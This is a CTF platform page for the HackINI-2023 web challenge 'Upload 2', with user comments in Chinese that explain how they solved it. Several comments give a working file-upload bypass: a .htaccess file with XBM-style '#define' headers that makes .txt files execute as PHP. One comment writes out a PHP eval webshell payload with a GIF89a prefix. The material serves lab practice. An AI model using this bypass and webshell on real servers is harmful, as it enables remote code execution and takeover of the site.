列表

详情


Upload 2

HackINI-2023   WEB   已通过

题目作者: 未知

一  血: ‌‌‌‌‌Max_yiz

一血奖励: 0金币

解  决: 127

提  示:

描  述: We used a blacklist now ... can you **access** the flag now?\n\n\n\ \ **Author**: souad

去做题

HWHHJ @ 2024-06-06 23:22:19 👍0

逆天题目,还是能做


toxi @ 2024-04-07 23:22:19 👍0

只需要把文件后缀的.php换成.php5即可


啊这这 @ 2024-04-07 23:22:19 👍1

题目非常好 不过我有个疑问 为什么我上传的shell木马中的提交参数函数必须是REQUEST还要是大写 我尝试了GET POST都不行 大写是语法只能是大写还是其他原因吗


xiaoxiao972521 @ 2024-05-07 23:22:19 👍0

可以吧,$_GET $_REQUEST 都行,这些属于php函数,就是这个写法


我不知丢答案 @ 2024-03-07 23:22:19 👍0

为什么我上传.user.ini文件去连的时候连不上??


JJhello @ 2023-12-07 23:22:19 👍0

接下面,内容为一句话木马,然后蚁剑连shell.txt的路径即可


JJhello @ 2023-12-07 23:22:19 👍0

上传一个文件名为 ".htaccess",注意,文件名前面没有任何东西的,文件内容为: #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 然后上传shell.txt,内容为


samRsa @ 2023-12-07 23:22:19 👍0

1、bp抓包上传.htaccess #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 2、上传马 GIF89a <?php @eval($_POST['cmd']); ?>


PandaCattle @ 2023-10-07 23:22:19 👍0

看了官方wp就知道有多离谱。。https://github.com/Shellmates/HackINI-2k23-public/blob/main/web/upload-2/solve/README.md


hopeinhand @ 2023-09-07 23:22:19 👍0

后缀php不行,换后缀php5发现容器只允许.php后缀执行命令,使用.htaccess绕过


PandaCattle @ 2023-10-07 23:22:19 👍0

@jiangbw 做出来了,只能说逆天,.htaccess内容里面必须有#define width 16 #define height 7


PandaCattle @ 2023-10-07 23:22:19 👍0

@jiangbw 我也一样 直接报错了 是不是环境有问题


jiangbw @ 2023-10-07 23:22:19 👍0

@niano.0 .htaccess上传完就跳界面了,那怎么绕过啊


niano.0 @ 2023-10-07 23:22:19 👍0

@xjc7580 大佬,怎么做的呀


xjc7580 @ 2023-09-07 23:22:19 👍1

大佬,再给点提示呗,上传.htaccess与上传的shell不一个目录啊